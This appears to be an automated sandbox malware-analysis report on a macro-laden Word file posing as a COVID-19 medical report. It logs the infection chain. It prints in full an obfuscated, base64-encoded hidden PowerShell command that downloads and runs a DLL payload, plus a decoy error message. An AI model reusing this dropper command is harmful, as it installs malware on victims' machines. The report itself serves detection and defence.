Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F88C2 8_2_002F88C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E5EDF 8_2_002E5EDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E2CDA 8_2_002E2CDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F1AD1 8_2_002F1AD1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EEB26 8_2_002EEB26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E4B26 8_2_002E4B26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EFD22 8_2_002EFD22
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E3F0E 8_2_002E3F0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F410D 8_2_002F410D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EF908 8_2_002EF908
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F1108 8_2_002F1108
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E6509 8_2_002E6509
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E196F 8_2_002E196F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E6F7B 8_2_002E6F7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F915E 8_2_002F915E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F15AF 8_2_002F15AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E93AD 8_2_002E93AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E87AA 8_2_002E87AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EB7BC 8_2_002EB7BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F21B0 8_2_002F21B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F0B86 8_2_002F0B86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EBF80 8_2_002EBF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E4390 8_2_002E4390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E71EC 8_2_002E71EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EF1ED 8_2_002EF1ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EE1E9 8_2_002EE1E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E8FE5 8_2_002E8FE5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EC3FE 8_2_002EC3FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EAFF9 8_2_002EAFF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E45F9 8_2_002E45F9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E1BF7 8_2_002E1BF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002ECDF7 8_2_002ECDF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E83F0 8_2_002E83F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F7FCC 8_2_002F7FCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E97DE 8_2_002E97DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002ED7D7 8_2_002ED7D7
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: GT-9333 Medical report COVID-19.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Dk5att0cu_9jsb, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: GT-9333 Medical report COVID-19.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10004D10 appears 33 times
PE file contains strange resources
Source: Chpieog.dll.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chpieog.dll.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chpieog.dll.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chpieog.dll.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chpieog.dll.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Chpieog.dll.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 00000005.00000002.2112271033.0000000000326000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2112362242.0000000001B54000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@12/9@5/6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F90E0 CreateToolhelp32Snapshot, 8_2_002F90E0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$-9333 Medical report COVID-19.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCA7F.tmp Jump to behavior
Source: GT-9333 Medical report COVID-19.doc OLE indicator, Word Document stream: true
Source: GT-9333 Medical report COVID-19.doc OLE document summary: title field not present or empty
Source: GT-9333 Medical report COVID-19.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............)........................... .?.......?...............).....X.).............#...............................h.......5kU.......)..... Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............)...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........).....L.................)..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................&.j......................P.............}..v............0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................&.j..... P...............P.............}..v............0.{...............|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.>.....................t&.j......................P.............}..v............0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................t&.j......|...............P.............}..v....p.......0.{.............H.|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#................&.j......C...............P.............}..v.....P......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#................&.j..... P...............P.............}..v.....P......0.{...............|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j.....J|...............P.............}..v............0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............4..j....x.................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j.....J|...............P.............}..v............0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............4..j....x.................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.....J|...............P.............}..v............0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............4..j....x.................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.{.............hG|.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[...............4..j......................P.............}..v....H.......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.6.............}..v....X.......0.{.............hG|.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g...............4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X#......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....$................P.............}..v.....$......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X+......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....,................P.............}..v.....,......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X3......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....4................P.............}..v.....4......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X;......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.>.....................4..j.....<................P.............}..v.....<......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....XC......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....D................P.............}..v.....D......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....XK......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....L................P.............}..v.....L......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....XS......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....T................P.............}..v.....T......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X[......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....\................P.............}..v.....\......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....Xc......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....d................P.............}..v.....d......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....Xk......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....l................P.............}..v.....l......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....Xs......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....t................P.............}..v.....t......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X{......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....|................P.............}..v.....|......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X.......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j......................P.............}..v............0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X#......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....$................P.............}..v.....$......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....J|...............P.............}..v....X+......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................4..j.....,................P.............}..v.....,......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j.....J|...............P.............}..v.....1......0.{.....................t....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............4..j.....2................P.............}..v.....3......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j.....J|...............P.............}..v.....9......0.{............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../...............4..j....x:................P.............}..v.....:......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;..................j.....J|...............P.............}..v....H@......0.{.....................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;...............4..j.....A................P.............}..v.....A......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G....... ..........j.....J|...............P.............}..v.....E......0.{.............hG|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G...............4..j.....E................P.............}..v....HF......0.{..............H|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.{.............................h.X..... .........P.............}..v......'..... .................|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....(................P.............}..v......'.....0.{...............|............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
Source: GT-9333 Medical report COVID-19.doc ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
